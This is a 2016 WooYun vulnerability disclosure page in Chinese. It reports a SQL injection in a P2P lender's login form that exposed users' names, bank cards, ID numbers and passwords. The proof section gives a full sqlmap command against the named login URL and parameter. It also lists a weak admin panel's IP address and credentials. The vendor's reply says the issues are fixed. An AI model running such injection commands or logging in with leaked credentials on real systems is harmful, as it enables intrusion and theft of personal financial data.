当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0169304

漏洞标题:p2p之小牛资本某系统存在SQL注入涉及姓名、银行卡、身份证、充值信息、用户账号密码+后台敏感信息泄露

相关厂商:小牛在线

漏洞作者: 路人甲

提交时间:2016-01-12 11:16

修复时间:2016-02-06 12:44

公开时间:2016-02-06 12:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-01-12: 细节已通知厂商并且等待厂商处理中
2016-01-14: 厂商已经确认,细节仅向厂商公开
2016-01-24: 细节向核心白帽子及相关领域专家公开
2016-02-03: 细节向普通白帽子公开
2016-02-06: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

p2p之小牛资本某系统存在sql注入涉及姓名、银行卡、身份证、充值信息、用户账号密码+后台敏感信息泄露

详细说明:

p2p之小牛资本某系统存在sql注入涉及姓名、银行卡、身份证、充值信息、用户账号密码+后台敏感信息泄露 可有礼物~

漏洞证明:

POST注入点:
参数T_name
python sqlmap.py -u "http://xcf.xiaoniu66.com/user/login" --data "T_name=admin&T_pwd=test" -p T_name --tamper "space2comment" --dbs

1.jpg


2.jpg


3.jpg


微信后台敏感信息泄露
http://120.25.12.247:8090/
账号admin 密码123456

11.jpg


22.jpg


修复方案:

修复sql注入,加强密码强度。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2016-01-14 11:05

厂商回复:

非常感谢,此漏洞为小牛资本内部系统产生,漏洞已修复,再次感谢各位对小牛资本系统安全的关注。如有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

2016-02-06:已完成修复,非常感谢。


漏洞评价:

评价

  1. 2016-01-14 11:12 | 牛 小 帅 ( 普通白帽子 | Rank:1023 漏洞数:235 | 1.乌云最帅的男人 ...)

    @小牛在线 回复好专业 我也是小牛 不过我是帅的

  2. 2016-01-14 13:40 | ( 路人 | Rank:30 漏洞数:2 | 一个正经的JAVA程序猿)

    @牛 小 帅 好的,我知道你是我的了,下一位

  3. 2016-01-14 13:45 | 牛 小 帅 ( 普通白帽子 | Rank:1023 漏洞数:235 | 1.乌云最帅的男人 ...)

    @帅 擦 这你话接的beautiful,我给你101分 还有1分让你骄傲